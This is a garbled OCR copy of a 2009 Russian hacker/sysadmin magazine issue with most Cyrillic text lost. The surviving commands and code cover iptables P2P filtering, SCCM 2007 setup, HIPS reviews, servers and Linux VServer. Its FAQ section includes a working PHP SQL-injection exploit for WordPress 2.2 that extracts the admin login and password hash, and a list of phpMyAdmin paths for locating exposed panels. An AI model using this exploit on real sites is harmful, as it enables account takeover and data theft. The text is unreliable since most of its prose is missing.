$ cd ../iptables
$ iptables -v
iptables v1.3.8
$ sudo patch -p1 < ../netfilter-layer7-v2.21/iptables1.3-for-kernel-2.6.20forward-layer7-2.21.patch
$ sudo chmod +x extensions/.layer7-test

iptables:
$ make KERNEL_DIR=/usr/src/linux
$ sudo make install

IPP2P IPP2P , P2P-. l7-filter,


Netfilter/iptables, .
.
IPP2P . , IPP2P
, , .
, ,
. DVD-
ipp2p-0.8.2.tar.gz, ipp2p-0.8.2-kernel-2.6.22.patch
:
$ sudo make

, ipp2p-0.8.2/Makefile:36:
You need to install iptables sources and maybe set IPTABLES_SRC.
, ,
iptables.h. /usr/src/iptables.
Makefile :
$ sudo nano Makefile
IPTABLES_SRC = $(wildcard /usr/src/iptables)
#CFLAGS = -O3 -Wall

. , ,
l7-filter, IPP2P make oldconfig && make prepare ( IPP2P
). libipt_ipp2p.
so iptables:
$ sudo cp libipt_ipp2p.so /usr/lib/iptables

:
:
$ sudo make menuconfig

Networking Networking option Network packet


filtering framework(Netfilter) Core Netfilter Configuration,
Connection tracking flow accounting Layer 7 match
support. string, , Netfilter
(FTP, H323 .) .
; /etc/l7protocols:

$ sudo cp libipt_ipp2p.so /lib/iptables


$ sudo cp ipt_ipp2p.ko /lib/modules/`uname -r`/kernel/
net/ipv4/netfilter
$ sudo modprobe ipt_ipp2p
$ sudo bash -c "echo ipt_ipp2p >> /etc/modules"

! :
$ sudo iptables -m ipp2p --help

$ tar xzvf l7-protocols-2009-05-28.tar.gz


$ cd l7-protocols-2009-05-28/
$ sudo make install

. iptables
-m layer7 --help . , BitTorrent, AIM Skype, :
iptables -A FORWARD -m layer7 l7proto bittorrent -j
DROP

120

, :
iptables -A FORWARD -m ipp2p --edk --kazaa --gnu --bit \
--apple --dc --soul --winmx --ares -j DROP

, . USB/CD/DVD, , . z
X 08 /128/ 09

>> SYN/ACK
GRINDER
/GRINDER@SYNACK.RU /


SCCM:
IT-

>> SYN/ACK

,
, , IT- .

GPO - Radmin.
, .
Microsoft System Center Configuration
Manager, IT-
.
SCCM SCCM 2007 R2 (www.microsoft.com/
systemcenter/configurationmanager)

Systems
Management Server (SMS).
IT-.
System Center , Configuration Manager .
, SCCM
, , , Microsoft, (Desired Configuration,

: , ,
),
.
SC (www.microsoft.com/systemcenter)
, .
:
Data Protection Manager

Windows;
Operations Manager ;
Essentials , X 08 /128/ 09


,
;
Virtual Machine Manager
;
Capacity Planner ,
,
,
;
Service Desk
, ;
Mobile Device Manager (MDM)
Windows Mobile;
Reporting Manager
.

,
,
. (Site system)
,
SCCM. SCCM
single-site multi-site.
SCCM.

(Primary site, ) (Secondary site,
Primary site). Primary
(Central
site). , , -

(). SCCM :
(Management point);
(BITS-enabled
distribution point);
(Reporting
point);
(Software Update Point);
(Server
locator point);

(Fallback status point, Win2k8).
C ,
. Branch
distribution point.
(3-5
) .
SQL-.
Client Agent,
. Native
( )
Mixed ( SMS). Native (
HTTPS). , ( IP, ).
, ( ) .

121

>> SYN/ACK

SCCM
SCCM R2,
WinXP/2003/VistaSP1/2k8, SCCM SP2, Win7/2k8R2/2k8SP2.
: WinXP, Vista
Win7 , Branch
distribution point.
. R2 :
SP1 Full. ,
VHD- SCCM.
, , SCCM SP1
R2. SCCM, , , , .
, SCCM: single-site
multi-site, , , . ,
- .
:
Configuration Manager
2007 Configuration
Manager 2007, TechNet.
PIII 733 , 256
, 5 10 . , ,
, , , .
, .
SQL Server 2005 SP2 (go.microsoft.com/fwlink/?LinkId=69795), . Express Edition . , : IIS 6.0, MMC
3.0, NET Framework 2.0, ASP.NET, BITS (Background Intelligent Transfer
Service) WebDAV.
( ), Win2k3 . , Primary Secondary
RODC ( ). Primary
, ,
, ,
, . Secondary
.
SCCM Win2k8 singlesite Primary site. ,
, AD, SQL- .
, BITS. , IIS
7.0, , .
,
, . . IIS
ASP.NET ASP ( ), Windows

122

, IIS 6 WMI IIS 6.


. , .
WebDAV Win2k8! , x86 x64 (go.microsoft.com/
fwlink/?LinkID=141805, go.microsoft.com/fwlink/?LinkID=141807)
.
WebDAV . IIS ( ), Default Web Site WebDAV Authoring
Rules. Enable WebDAV, WebDAV. . Add Authoring Rule.
. All Content, All users
Permissions Read. WebDAV,
WebDAV Settings:
Allow anonymous Property Queries (
) True;
Allow Custom Properties (
) False;
Allow property queries with infinite depth ( ) True;
Allow hidden files to be listed (
) True.
IIS.
IIS ,
.
, . applicationHost.config, %windir%\
System32\inetsrv\config, <fileExtensions> <requestFiltering>
allowed="true". :
<add fileExtension=".java" allowed="true" />

, .

SCCM SCCM SP1 (ConfigMgr07SP1Eval_RTM_RUS_6221.exe). .


AD. .
, SCCM, SMSETUP
BIN, , ( x64), extadsch.exe. ConfigMgr_ad_shema.ldf
,
C:\ExtADSch.log.
ConfigMgr_ad_shema.ldf.
, ldifde -i -f ConfigMgr_ad_shema.ldf.
splash.hta ( ) .
Run the prerequisite checker ,
X 08 /128/ 09

>> SYN/ACK

PREREQUISITE
CHECKER , SCCM
SCCM. : (Primary, Secondary CM Console); Primary
, SQL-, WSUS
Management Point (,
). WSUS , SDK Server
. , SDK WSUS,
,
, . SDK-
WSUS, .
; , , . Success ( ),
SCCM.

SCCM Install Configuration


Manager 2007 .
, ,
, .
,
SCCM
, SMS 2003 SCCM.
, Install a
Configuration Manager site server.
Installation
Setting, Simple Custom. SCCM,
Simple. , . Custom :
Site type . Primary Secondary.
, Primary.
Customer Experience Improvement Program
Configuration CEIP, .
SCCM ( , ).
( ),
.
X 08 /128/ 09

SCCM IIS, BITS



Site Settings ( , , 000 ) .
Site Mode Native Mixed. Native
,
PKI.
Client Agent Selection
, , , NAP (Network Access
Protection, ) .. .
Database server SQL-
.
SMS Provider Setting
SMS, , . , .
Management Point , . , ;
Port Setting TCP- .
80 443 ( Native mode).
Updated Prerequisite components Microsoft .
, , ( ).
(> 5 )
Prerequisite Checker Begin Install
SCCM. ,
. SP1 R2 .

SCCM - ,
,
, .
CM, ,
, . SCCM

INFO

info

WSUS 3.0
SP1 Win2k8

,
z 2009
.



Run the prerequisite
checker. .

HTTP://WWW
links

SCCM 2007 www.
microsoft.com
/systemcenter/
configuration
manager.

TechNet, SCCM technet.
microsoft.com/ru-ru/
configmgr.

123

>> SYN/ACK

SCCM

DVD
dvd


, ,
SCCM 2007 Win2k8
.

124

, . ,
(site boundary), , ,
(Discovery) (approval).
. SCCM , , site
boundary.
Database
Site management Site settings.

Boundaries. , , , New Boundary (Description), ,
(
), (Type).
; :
IP-subnet (), Active Directory site, IPv6 prefix IPaddress range. , , . Network Connection,
, :
Fast (LAN) Slow. , Boundaries,
.
Discovery methods, 6 ,

. 4 Active Directory ,
, Security;
Heartbeat ( ) Network ( ). Network discovery ,
AD. ,
. , , Enable ... ( Heartbeat
Discovery).
, AD, ( , LDAP
..), , . -

,
.
, Polling Schedule
. , Run discovery as soon as possible.
Active Directory attribute , .
Network discovery , . ,
Type of discovery : , + + . Subnets,
Domains, SNMP, SNMP Devices DHCP
. ,
Subnets ,
, Schedule
.
. .
. . Wake On
LAN
, /. Ports
. Advanced
, , hardware ID.

Automatically create new client records .... , Manually resolve conflicting records. Advanced
SCCM AD . Security

SCCM. , , Site Mode (, ) (Native
Mixed). ,
Approval settings:
Manually approve each computer ,
,
, ;
Automatically approve computers in trusted
domains (recommended) Discovery ;
Automatically approve all computers (not
recommended)
X 08 /128/ 09

>> SYN/ACK

SCCM
. , , AD, .
, .
This site containts only ConfigMgr 2007
clients SCCM- (
SMS ).
, .. (collection) (, ..)
, .
Computer management Collections. (, ). All Systems
, SCCM. ,
Update Collection Membership .
. , Client , , Approved/Assigned/Blocked/Active
. . : ( \\server\site\Client\ccmsetup.exe);
Push-; AD Logon,
.
. Client Push Install () SCCM.
Site settings Client installation method.
Client Push Install .
X 08 /128/ 09

Client Push Installations . , Enable Client Push Installations for assigned


resources System type ,
Ser vers, Workstations
Domain controllers. Enable Client Push
Installations to the site systems,
SCCM. Accounts
, .
.
Install client .
: , ( ,
..) Next. .

SCCM
, .

, .
,
,
. z

125

>> SYN/ACK
GRINDER
/ GRINDER@SYNACK.RU /

>> SYN/ACK

, . ,
, .
HIPS.
HIPS (Host Intrusion
Prevention System, )
.
,
(
, ),
, / /, ,

.
API-
,
, , .

,
, .
, HIPS .
.

,
, , . ,
, Prevx ( )
, -

126

(
) , .

.
(
, API-) HIPS
. .
: ,
- HIPS,
, ?
,
,
HIPS ,

.
, HIPS.
. .

DEFENSEWALL
: SoftSphere Technologies
Web: www.softsphere.com/rus
: Intel Pentium x86
300 , 256 / (x86/x64) 1 , 512
( WinXP Vista )
: Windows NT/2000/XP/2003/Vista

DefenseWall /
.
(Sandbox), .

-, P2P, IM-
.. , , .
( CD/DVD
). :
,
, .
, ,
. , .
.

(,
..), .

( ).
, , X 08 /128/ 09

>> SYN/ACK

,
.
. ,
, .
. DefenseWall , .
.
: , , ,
. .
, , .
.
/ (GoBanking/Shopping)
, .
.
Expert Mode,
,
.
, ,
(Apache, IIS etc)
, ,
(CodeRed, Slammer, Sasser, Blaster), . ,
, ,
.

SAFE'N'SEC
: S.N.Safe&Software
Web: www.safensoft.ru
: Intel Pentium x86 300 , 256
WinXP / (x86/x64) 1 , 512 Vista
: Windows XP/Vista
HIPS Safe'n'Sec,
S.N.Safe&Software,
V.I.P.O. (Valid Inside Permitted Operations). .
Safe'n'Sec .
, ( SHA-256).
, , ,
, , .
, ,
.
,
. , , . X 08 /128/ 09

.
Safe'n'Sec , .
. Safe'n'Sec 2009. Safe'n'Sec
Enterprise . :
Safe'n'Sec Admin Explorer ;
;
Service Center ,
; , .
, , Dr.Web -.
, .
, ,
, , USB-.
, Safe'n'Sec ,
. , Kaspersky AntiVirus 2009 .

MCAFEE HOST INTRUSION PREVENTION


FOR DESKTOPS AND SERVERS
: Network Associates
Web: www.mcafee.com, www.mcafeesecurity.ru
:
: Windows XP/Vista
: Windows 2000/2003/2008 (x86/x64), RHE Linux 4.0
(x86), Solaris 8/9/10
HIPS McAfee Desktop
Firewall HIPS Entercept ( 2003
, Network Associates).

Total Protection for Endpoint. , : ,
.
, ,
, .
( ) USB-.
.
, , ,
VPN. ,

127

>> SYN/ACK

SAFE'N'SEC ADMIN EXPLORER



SAFE'N'SEC

INFO

info

HIPS



.


McAfee
:

,
.
Prevx

.
,

, HIPS


.

128

.
(), . IPS
, ,

CISCO SECURITY
AGENT (CSA)

Cisco, 2003
Okena, HIPS
StormWatch Agent,
. CSA
, Windows 2k Vista, RHEL 3.0/4.0, Solaris 8/9
VMware.
. ,
, ,
,
( ,
COM-), , . ,

.
.
. ,

(, , CD/DVD), ..
Cisco Management Center for Cisco Security Agents.
, CSA Cisco IPS, ,
(NAC),
Cisco MARS. ,
.

McAfee .
,
. HIPS , () ( ).
Server, ,
- (Apache 1.3./2., Sun ONE/Java
Web Server) (SQL Server 2000)
(Directory traversal, DoS, SQL
injection .).
HIPS
,
, ePolicy Orchestrator
(
McAfee). , HIPS
ePO.
ePO: 3.6.1 MMC, 4.0.0 -.
HTTP/
HTTPS .
ePO-
Win2k SP4/2003 SP1/SP2/R2,
Win2k/XP/2003/Vista. SQL- SQL Server 2005
Express Edition; SQL Server 2000/2005.

PREVX 3.0
: Prevx Limited
Web: prevx.com
:
: Windows 98/NT/2000/XP/2003/Vista/2008/
Se7en
Prevx 2004 Community IPS,
. Cloud computing
, (software-as-service, SAAS)
Prevx .
Prevx ,
. , .
X 08 /128/ 09

>> SYN/ACK

EPO:
MCAFEE

.
(Prevx Cloud Community Database).
IPS , .
, 768
.
, . . ,
2-4 . , .
, ,
,
.
.
,
. 4 10 , .
250 .
: ( ), (
) . . Prevx , ,
Windows;
.
Home, , Business Enterprise
, . Free Malware Monitor,
, , ,
. ,
.
Prevx ,
: ,
, .
.
,
.
X 08 /128/ 09

PREVX

PREVX : ,

-

, , . HIPS .
. z


?
, , HIPS
,
,
, . HIPS
.

.

DVD
dvd

Safe'n'Sec,
DefenseWall Prevx.

129

>> SYN/ACK
NATHAN BINKERT


/ NAT@SYNACK.RU /

PRIMERGY RX200 S5:


1U- Fujitsu


Fujitsu PRIMERGY RX200 S5
> :
D 2786 ( Intel 5500)
> :
1 2 Intel Xeon 55xx
> :
1 96 DIMM DDR3 1066/1333 (12
)
ECC, SDCC, Memory Scrubbing,

> :
8 2,5- SAS

>> SYN/ACK

> RAID:
RAID- 0/1


RX200 S5 Fujitsu,
HP IBM,
.
/ Intel Xeon 55xx,
SAS, 96 DDR3.
RAID 0/1 PCI-X RAID
0,1,10,5,50,6,60. .
-

130

> :
2 Ethernet 1 /
1 iRMC S2 (10/100
/)
> :

,

( 1 + 1)
> :
1 PCI-Express x4 ()
2 PCI-Express x8 (1
, 1 )

> :
ServerView Local Service
Panel (LSP)

(iRMC S2, 32
),
IPMI 2.0
> :
Cool-safe
6
(5+1)
> :
(1U, 431x765x43 )

> -:
7 USB 2.0 (3 , 3
, 1 )
2 VGA (1 )
1 RS-232-C (9-)

> :
3

.
Blue-Ray
Cool-safe.
, Cool-safe,
Computational
Fluid Dynamics, ,


,
.
. ,
89%, -




Green IT.
IPMI 2.0
. .
Microsoft Windows
Server 2003/2008, Novell SUSE Linux Enterprise
Server, Red Hat Enterprise Linux, VMware
Infrastructure.
Linux .
: 60000 .
X 08 /128/ 09

>> SYN/ACK
NATHAN BINKERT
/ NAT@SYNACK.RU /


:
R-Style Marshall NP 2010
> :
16 DDR2-533 DDR2-667
ECC (8 )
> :
IDE-
6 SATA
4 SAS

> RAID:
RAID 0, 1, 10, 5
> :
2 Intel Gigabit Ethernet
> :
550
650


R-Style Marshall NP 2010

>> SYN/ACK

> :
2/4- Intel
Xeon Processor 50xx, 51xx 53xx
667 , 1067 1333

> :
2 PCI Express x4
2 PCI-X 64-bit/133
1 PCI 32-bit/33

> :
Intel 5000V

> -:
7 USB 2.0 (4 , 2 , 1 ,
USB FDD)
2 RS-232-C

Marshall NP 2010

R-Style Computers.
,
( ).
,
, .
Intel Xeon 5000,
DDR2-667 ECC,
16 , 3.5"

SAS/SATA-.

,
web- ( ).
550
650
.

DVDRW - USB-.

X 08 /128/ 09

2 DB-9 (9 pin, )
2 PS/2
> :
: 80
:
120
SAS/SATA HDD:
92
> :
ATI ES1000 (16 SDRAM)
CD, DVD/CDRW DVDRW
> :
(452x235x483)
(6U, 235447483)
> :
3

.
(, ,
, -
).

3
100 , .
: Microsoft Windows Server
2003/2008.
: 35000 .

131

>> SYN/ACK

/ ZOBNIN@GMAIL.COM /


Linux VServer

>> SYN/ACK

, ?
, root? ?
Linux VServer
.

()
FreeBSD Jail.
,

(, /dev /
proc, ),
IP-.
,
, Xen, VMWare KVM,

,
.

,
.
,
,
:

( 2-3%)
.

- ,

. ,
, ,
,

,
,
, ,
.
- .

132

VSERVER? UNIX-

. FreeBSD
Jail, Solaris
(Zones), Linux OpenVZ Linux
VServer.
OpenVZ (openvz.org)
, ,
.
Linux VServer (linux-vserver.org),
,
. OpenVZ

VPS ( ) , VServer
FreeBSD
Jail. Linux VServer
( 7 ) ,
Linux;

,
.
Linux VServer
: Linux-

. VServer
,

Ubuntu 9.04,
,
kernel.org .
, Ubuntu 9.04,
2.6.28, , .

1. apt keyring
VServer:
$ sudo apt-key adv --recv-keys
--keyserver keyserver.ubuntu.com
BB9BFB5B

2.
VServer /etc/apt/sources.list:
deb http://ppa.launchpad.net/
christoph-lukas/ppa/ubuntu jaunty
main
deb-src http://ppa.launchpad.net/
christoph-lukas/ppa/ubuntu jaunty
main

3. :
$ sudo apt-get update
$ sudo apt-get install linux-imagevserver linux-headers-vserver utilvserver

,
.
1. :
# cd /usr/src
# wget http://www.kernel.org/
pub/linux/kernel/v2.6/linux-2.6.28.7.tar.bz2
# wget http://vserver.13thfloor.
at/Experimental/patch-2.6.28.7vs2.3.0.36.8.diff

2. ,
:
# tar -xjf linux-2.6.28.7.tar.bz2
X 08 /128/ 09

>> SYN/ACK
eth0 82.195.23.28

IPTables
iptables -t nat -A POSTROUTING \
-s 192.168.1.1/24 -d ! 192.168.1.1/24 \
-J SNAT --to-source 82.195.23.28

Linux VPS
eth0: alias 192.168.1.1

Linux
Host System
#
#
#
#

cd linux-2.6.28.7
cp /boot/config-X.X.X .
patch -p1 < ../patch-2.6.28.7-vs2.3.0.36.8.diff
make menuconfig

3. Linux VServer:
Enable Legacy Kernel API API .
Enable Virtualized Guest Time . ,

,
Enable Proc Security , , /proc .

Enable Hard CPU Limits


.
Tag NFSD User Auth and Files
NFS-
Maximum number of Contexts

4. :
# make
# make modules_install
# cp arch/i386/boot/bzImage /boot/vmlinuz-2.6.28.7-vs2.3

5. :
# VI /BOOT/GRUB/MENU.LST
title Linux 2.6.28.7-vs2.3
root (hd0,0)
kernel /boot/vmlinuz-2.6.28.7-vs2.3 root=/dev/hda1 ro
initrd /boot/initrd.img-2.6.28.7-vs2.3
boot

6. :
# cd /tmp
# wget http://ftp.linux-vserver.org/pub/utils/utilvserver/util-vserver-0.30.215.tar.bz2
# tar xjf util-vserver-0.30.215.tar.bz2
# cd util-vserver-0.30.215
# ./configure --prefix=/usr --sysconfdir=/etc
# make install
X 08 /128/ 09


( Linux VServer),
. ,
,
, tag.

, , ,
.
/etc/fstab, , , /var/lib (
/var/lib/vservers),
tag. :
/dev/sda3 /var ext3 tag 1 1

reiserfs,
attrs. .
Chroot Barrier,
,
:
# setattr --barrier /var/lib/vservers


kernel.vshelper , :
# echo "kernel.vshelper = /usr/lib/util-vserver/vshelper"
>> /etc/sysctl.conf
# sysctl -p


Linux-,
. ,
()
. ftp://ftp.
pld-linux.org/people/hawk/vserver-templates/,
CentOS, Debian, Fedora Ubuntu,
VServer.
Ubuntu ( ,
):
$ cd /tmp
$ wget ftp://ftp.pld-linux.org/people/hawk/vservertemplates/Ubuntu/jaunty-i386.tar.bz2

133

>> SYN/ACK

VSERVER-STAT

PS

INFO

info

/
var/lib/vserver.


, /
etc/vserver/.defaults/
vdirbase
.

vserver
,
(vserver
delete),
(vserver exec),
(vserver
rpm, vserver apt-get).

# vserver vps1 build \


--context 10 \
--hostname vps1.host.ru \
--interface eth0:192.168.1.1/24 \
--initstyle plain \
-m template -- \
-d jaunty \
-t /tmp/jaunty-i386.tar.bz2

/var/lib/
vservers/vps1 .
, vps1, ( ),
vps1.
host.ru,
eth0 IP- 192.168.1.1,
(plain /sbin/init). ,
/tmp/
jaunty-i386.tar.bz2, Ubuntu 9.04
(Jaunty Jackalope).
VServer
, (
),
, man- vserverbuild.

:
# vserver vps1 start
# vserver-stat

LINUX VSERVER
- IP-
.
(0
, 1 ..)

, 1
:
// eth1
-
# echo "eth1" > dev
// IP-
# echo "192.168.1.2" > ip
# echo "24" > prefix

, ifconfig,
,
. VServer
,
.

. , /etc/fstab,
/etc/vservers/vps1/fstab.
,
/dev, /proc /tmp, , , - (
Gentoo):
/usr/portage /usr/portage none bind,rw 0 0

WARNING

.
:
# vserver vps1 stop

warning


top ps
,

.
,
vps vtop.

134


, ,
.., /
etc/vservers/_. /
etc/servers/vps1 .
interfaces,
0.
,
. Linux VServer,
FreeBSD Jail,

IP- ,
,
.
:
1. IP- ( ).
2. NAT -
,
-
.
. SNAT,

:
X 08 /128/ 09

>> SYN/ACK
# chxid -URx -c vps1 /var/lib/vservers/vps1

,
vdlimit,
:
# vdlimit --xid vps1 /var/lib/vservers/vps1

, /etc/
vservers/vps1/dlimits/root vdlimit '--remove',
:

/DEV
,

# iptables -t nat -A POSTROUTING -s 192.168.1.1/24 \
-d ! 192.168.1.1/24 -j SNAT --to-source < IP>

DNAT,
IP- (
web-, VServer):
# iptables -t nat -A PREROUTING -s ! 192.168.1.1/24 \
-m tcp -p tcp --dport 80 \
-j DNAT --to-destination 192.168.1.1:80

, , dlimits rlimits.
,
-. , /etc/vservers/vps1/dlimits, , :
# cd /etc/vservers/vps1
# mkdir dlimits


( ):
# mkdir dlimits/root
# cd dlimits/root

, :
# echo "/var/lib/vservers/vps1" > directory

( ):
# echo "10000" > inodes_total

, ( 10 ):
# echo "10485760" > space_total

root :
# echo "5" > reserved

,
vps1 (, , ):
X 08 /128/ 09

# vdlimit --xid vps1 --remove /var/lib/vservers/vps1

/etc/vservers/_/
rlimits. Linux VServer setrlimit(2)
. 22
(15 + 7,
Linux VServer), ( = 4 x86):
cpu , ,
fsize
rss
nproc
as
nice ,
nsock
openfd

,
/etc/
vservers/_/rlimits. , 100 (25600*4 ):
# mkdir /etc/vservers/vps1/rlimits
# echo "25600" > /etc/vservers/vps1/rlimits/as

, Linux VServer ,
, ,
. , , /
etc/vservers/_/ccapabilities.
:
SET_UTSNAME
setdomainname(2) sethostname(2)
SET_RLIMIT setrlimit(2)
RAW_ICMP ""
SYSLOG syslog(2)
SECURE_MOUNT mount(2)
SECURE_REMOUNT
BINARY_MOUNT /
QUOTA_CTL
ADMIN_MAPPER "device mapper"
ADMIN_CLOOP loop-
KTHREAD

,
flags, nflags, bcapabilities ncaps.
linux-vserver.org/util-vserver:Capabilities_
and_Flags.z

135

>> units

/ LOZOVSKY@GAMELAND.RU /

PSYCHO:


, , PSYCHO-, ,
,
- , , , .


,

,
, -. ,

,

-, ,

.
, -


,
.

, ,
,
, -.
, homo sapiens.
.


,
,

. -
,

?

?

136

?
,

, , ?

.

.
(- 8-10
) . ,

.





.
?

.



,

/ ,

. , , ,
.
, ,
,
.

,
IT-.
,
,



.
.

,
(
) .
. -
, - , -
.
,

.

. ,
, , ,
. ,

-, ,
-, , ,
. ,
,
,
, , , . ?
, ,
. , .
.
?
, ,
,
?
,

, ,

.
,
, .
, .
,
- .
, ,
,
.

-
. . ?
! -
,
,
,
. ,


25 , , ,
, , , .
, ,
,
, , , ,
. , ,
-
-
-, ,
.
, , X 08 /128/ 09

>> units

.

. ,

,
,
,
.



( !) .
,


. , ,
,
,

.
,
( , , ?),

. ,
:
,
. .
,
,

.
,
, .
X 08 /128/ 09

, ,
,
.
,
,
,


.


, ,

! ,
! ,
, ,
30-45 .
,

?
. ,

.
,
, . -
(
), -
. .
, .
(-, , ,
), ,

,

.
, . .


( , )

.
,

,
.
,
(---)


.
,
,
,
. ,

,

,
.

. .
.
.
, , .

.


,

(,

). ?
.
, ,
,
,
.. ,
,
.
: -
, -
, - ,
.
.
, ,

137

>> units


,

, .
,
, ,
, ,


. ! , , ,


!
,
,
, , .
,


-, ,
,
.
z: ,

?
..: -
.
, -

138

.
,
, ?

, -
.
,

, ,
. , ,
.

,
?
-
, ,

.
z: ,

. :

,
,
?
..: . , .
.
z: ?

..: .
-,

.
.
,

.
z: ,


?
,
?
..:

,
( ,
).
, ,
,
. ?

,
,
(, ,
,

).

. ,
, ,
, .
.


, , , ,
( )
.

.
, ,
. .
.
z: -


?

?
..:

. .
,

.

, ,
.

.
,

.
, ,

.
, : X 08 /128/ 09

>> units

.
.
.
(
), , .
, ,
.
z: , , -

.


.
..: . ,
, ,
, .
,
, ,

. , .
-,
.
z: -

,
?
..:
.

, . ,
.
, .
, ,
- . , , .
, ,
.
z: . -


. ,
?
.
..:
:
1. ,
,

.
2. , ,
.
3. .

. , ,
, ,
. ! ,
,
, , ,
.

, .
,
,

.
,
.
4. , .
. ,
, ,

. ,

.
,
.
,
,
.

, -

.
,
,
,

,
,
.
,

,
,
, .
, ,

.
,
,
,
.
,
. ,
, ,

, ,
:
,
,
.
,
, ,
,

,
.
,

( -
).

,
,
,
.
, ,


,
,
java
programming for dummies.
,


. ,

, ,

/

. ! z

5. !
.
. .
, ,
.
X 08 /128/ 09

139

>> units

/ ICQ 884888, HTTP://WAP-CHAT.RU /

FAQ UNITED:

Q: Google PR, .

Alexa rank?
A: ! Alexa.com

XML- ,
, , rank,
(, ,
..).

rank:
<?php
function alexarank($url,
$ip = '127.0.0.1')
{
$url = preg_replace(
'/https?:\/\//i', '', $url);
$uid = sprintf(
'2007%02d%02d%02d%02d%02d',
rand(1,12), rand(1,28),
rand(1,24), rand(1,60),
rand(1,60));
$alexa_url = 'http://xml.alexa.
com/data?cli=10&dat=nsa&ver=quirksearchstatus&uid=' .$uid .
'&userip=' . $ip . '&url=' .
urlencode($url);
$content = file_get_
contents($alexa_url);
if (preg_match(/<POPULARITY

140

URL="[^"]+" TEXT="(\d+)"\/>/i',
$content, $matches))
{
return trim($matches[1]);
}
return 'Unknown';
}
print alexarank('google.com');
?>


XML-
Alexa.
Q: PHP- Alexa rank?
?

, :
<?php
$netcraft = file_get_
contents('http://searchdns.
netcraft.com/?position=limited&hos
t=google.com');
preg_match('|<a href="http://
uptime\.netcraft\.com/up/
graph/\?host=[a-z0-9\._-]+">(.+?)</
a>|i',$netcraft,$os_arr);
print $os_arr[1];
?>

, Nmap (, , - 10 ,
. Step).

A: ,


alexa.com ( ,
),
- Google PR/Alexa rank; , http://
extra-traffic.com/pra_checker.htm.ru.htm.
,
15 .
Q: PHP , ?
A: -

netcraft.com,

Q:
- /.
, ?
A:

http://whitepages.
anywho.com,
:).
, :
1. Last Name (Required)
, , Jackson (RIP! . );
2. State
, , CA;
X 08 /128/ 09

>> units

3. Find A Person;
4. , , :

3. <Enter>
:)

(site:site.com
phpmyadmin), robots.txt .

Q: 100%-

A L Jackson
Some address
Some city, CA some zip code
(408) some phone number

Q: ,

A: ,

mysql?

d_x Forum
Detector. :

A: ! ,

Q: ,
?
A: whoer.net -

. (
whoer.net/ext),
:
1. IP Address ( , IP,
, ip ,
whois).
2. Location (, , , ,
, /,
).
3. Time (, , , UTC, GMT, ).
4. HTTP Headers ( ,
).
5. Scripts ( ActiveX, VBScript,
JavaScript, Java).
6. , (,
).
7. Navigator ( ).
8. Plugins (, ).
, -

. , /
/VPN.
Q: -
?
A: DeeIP, WHB, -


. :
1. ,
,
;
2.
javascript-:
JavScript: this.disabled=true;
document.regMe.submit();
X 08 /128/ 09

(

IPB, phpBB, vBulletin, MyBB)



(, )
PR
, socks5, , socks5

2 :
1.
mysql -h[host] -u[user] -p[pass]
[base] < dump.sql
2.
mysqldump -h[host] -u[user] -p[pass]
[base] > dump.sql


. ,

:
mysqldump -h[host] -u[user] -p[pass]
[base]|tar zcfv base.tar.gz


: http://forum.
antichat.ru/thread114708.html.

mysql?

Q:

A:

phpMyAdmin?

PHP-
Sypex Dumper (sypex.net/products/dumper), , ,
- ,

,
,
.
:
;
;
;
;
;
;
.

Q: -
PhpMyAdmin !

A: -

,
phpmyadmin:
/phpMyAdmin-x.x.x/ ( x.x.x
)
/phpm/
/phpmy/
/phpmyadmin/
/PMA/
/mysql/
/admin/
/db/
/dbadmin/
/phpmyadmin2/
/mysqladmin/
/mysql-admin/
/myadmin/
/phpMyA/
/phpmyad/
/phpMyAdmi/

, phpmyadmin

Q:
WordPress. - .
A: :).

sql- ,
Alex Concha

141

>> units
buayacorp.com.
, ./wp-includes/atomlib.php
:
function xml_escape($string)
{
return str_replace(
array('&','"',"",'<','>'),
array('&','"',''','<','>'),
$string );
}

, ,
,
PUT atom-,
\ ( WordPress, ,
GET, POST,
COOKIE, SERVER ).
,
, 2.2
2.7.1,
,
.


2.2 2.2.3 edit_posts (


,
):
<?php
$site='lamer.com';
$path='/wp223/wp-app.php?action=/
post/1'; //
$user='editor'; //
$passwd='editor'; //
$auth=base64_
encode($user.":".$passwd);
$fp = fsockopen($site, 80, $errno,
$errstr, 30);
$data=<feed>
<entry>
<id>http://lamer.com/
wp223/2009/03/01/hello-world/</id>
<title type="html">test\</
title>
<summary type="html">,post_
name=(select concat(user_
login,0x3a,user_pass) from wp_users
where ID=1) where id=1/*</summary>
</entry>
</feed>';
$out = "PUT $path HTTP/1.1\r\n";
$out .= "Host: $site\r\n";
$out .= "Content-Type: application/
atom+xml\r\n";
$out .= "Connection: Close\r\n";
$out .= "User-Agent: Opera\r\n";
$out .= "Authorization: Basic
$auth\r\n";
$out .= "Content-Length:
".strlen($data)."\r\n\r\n";

142

fwrite($fp, $out.$data);
fclose($fp);
?>


http://lamer.
com/?p=[ID ]. @test, post_excerpt =,
- :
http://lamer/wp222/2009/03/01/admin:21232f29
7a57a5a743894a0e4a801fc3/ (-,
).
Q: , ,
.mp4. ,
,
.
90 .
(, ,
)?
A: :).

- .

( lossless).
VirtualDub
(www.virtualdub.org). :
1. File Open
video File;
2. Video Filters, ( Add) Rotate.
3. : left
by 90 right by 90.
.
. Video
Full processing mode.
Video
compression.
4. File Save as
AVI.
5. ,
AVI-.

Picasa (picasa.google.com/intl/ru),
.
Q: VMWare
Fedora 10 (iso )


.
chaosreader
(chaosreader.sourceforge.net),
Perl. -
tcpdump snoff,
HTML- telnet-,
, FTP,
http- (HTML-,
GIF JPEG) .. ..
pcapsipdump (sourceforge.net/projects/
psipdump) ,

SIP-, .
SIP-
.
Smbsniff (http://www.hsc.fr/ressources/outils/
smbsniff/index.html.en) , SMB/
CIFS. , ,
.

,
, Tcpreplay (tcpreplay.synfin.
net), .
tcprewrite , .
tcpreplay
: tcpreplay --intf1=eth0
sample.pcap.
Q: 2-hop SSH. -
SSH Proxy?
A: , serv1,

serv1.mydomain.com.
serv2 192.168.1.100,
, serv1,
.
locuser,
remuser.
SSH-, ~/.ssh/
config :
Host *
ForwardAgent yes
Host serv1
HostName alpha.pupkin.net
User locuser

. , Up <Alt+F2>.
?
A: , . -

/etc/vmware/
config:
xkeymap.nokeycodeMap = true
Q: tcpdump (tcpdump,
Wireshark, Kismet ) ?
A: ,

Wireshark
(www.wireshark.org), .

Host serv2
HostName 192.168.1.100
User remuser
ProxyCommand ssh serv1 nc %h %p

?
serv1 serv2
. SSH , ssh alpha.
ssh beta
serv2, alpha.
netcat
(netcat.sourceforge.net). z
X 08 /128/ 09

SSH-
PuTTY
PuTTY Connection Manager
MobaSSH
freeSSHd
WinSCP
Tera Term
WiSSH

